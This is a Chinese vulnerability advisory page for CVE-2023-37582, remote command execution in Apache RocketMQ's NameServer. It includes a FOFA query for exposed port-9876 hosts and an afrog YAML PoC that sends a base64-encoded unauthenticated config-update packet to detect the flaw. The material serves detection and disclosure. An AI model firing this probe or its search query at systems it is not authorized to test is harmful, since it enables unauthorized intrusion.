CVE-2023-37582: Apache RocketMQ 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: Apache RocketMQ | POC: 已公开

漏洞描述

当RocketMQ的NameServer组件暴露在外网时,并且缺乏有效的身份认证机制,那么攻击者可以利用更新配置功能,以RocketMQ运行的系统用户身份执行命令。 本次漏洞与CVE-2023-33246[1]不同的是,本次影响的是NameServer服务(默认9876端口),只要能访问到NameServer且该服务未开启身份认证可修改某些配置,就可实现远程命令执行,无需其他条件。 值得注意的是,即使升级到最新版本修复了漏洞,也强烈建议开启Broker、NameServer等组件的身份认证机制,未授权修改配置可能导致服务不可用等其他影响,故本次检测工具依旧是检测相关组件的未授权访问情况。 FOFA: port=9876 && protocol="rocketmq"

PoC代码[已公开]

id: CVE-2023-37582

info:
  name: Apache RocketMQ 远程命令执行漏洞
  author: xpoc
  severity: critical
  verified: false
  description: |
    当RocketMQ的NameServer组件暴露在外网时,并且缺乏有效的身份认证机制,那么攻击者可以利用更新配置功能,以RocketMQ运行的系统用户身份执行命令。
    本次漏洞与CVE-2023-33246[1]不同的是,本次影响的是NameServer服务(默认9876端口),只要能访问到NameServer且该服务未开启身份认证可修改某些配置,就可实现远程命令执行,无需其他条件。
    值得注意的是,即使升级到最新版本修复了漏洞,也强烈建议开启Broker、NameServer等组件的身份认证机制,未授权修改配置可能导致服务不可用等其他影响,故本次检测工具依旧是检测相关组件的未授权访问情况。
    FOFA: port=9876 && protocol="rocketmq"
  reference:
    - https://mp.weixin.qq.com/s/tHRjHpHTHc197JFU-FReHg
    - https://stack.chaitin.com/techblog/detail/126
  tags: rocketmq,rce,cve,cve2023
  created: 2023/08/31

set:
  hostname: request.url.host
  host: request.url.domain
  data: base64Decode("AAAA0AAAALJ7ImNvZGUiOjMxOCwiZXh0RmllbGRzIjp7IkFjY2Vzc0tleSI6InJvY2tldG1xMiIsIlNpZ25hdHVyZSI6ImNHSmpxMUZCTSs0VUJsUnNORE50azBVOW5EMD0ifSwiZmxhZyI6MCwibGFuZ3VhZ2UiOiJKQVZBIiwib3BhcXVlIjowLCJzZXJpYWxpemVUeXBlQ3VycmVudFJQQyI6IkpTT04iLCJ2ZXJzaW9uIjo0MzV9dGhpc19pc19rZXk9dGhpc19pc192YWx1ZQo=")
rules:
  r0:
    request:
      type: tcp
      host: "{{hostname}}"
      data: "{{data}}"
    expression: response.raw.bcontains(b'"code":0') && response.raw.bcontains(b'serializeTypeCurrentRPC')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-37582.yaml

相关漏洞推荐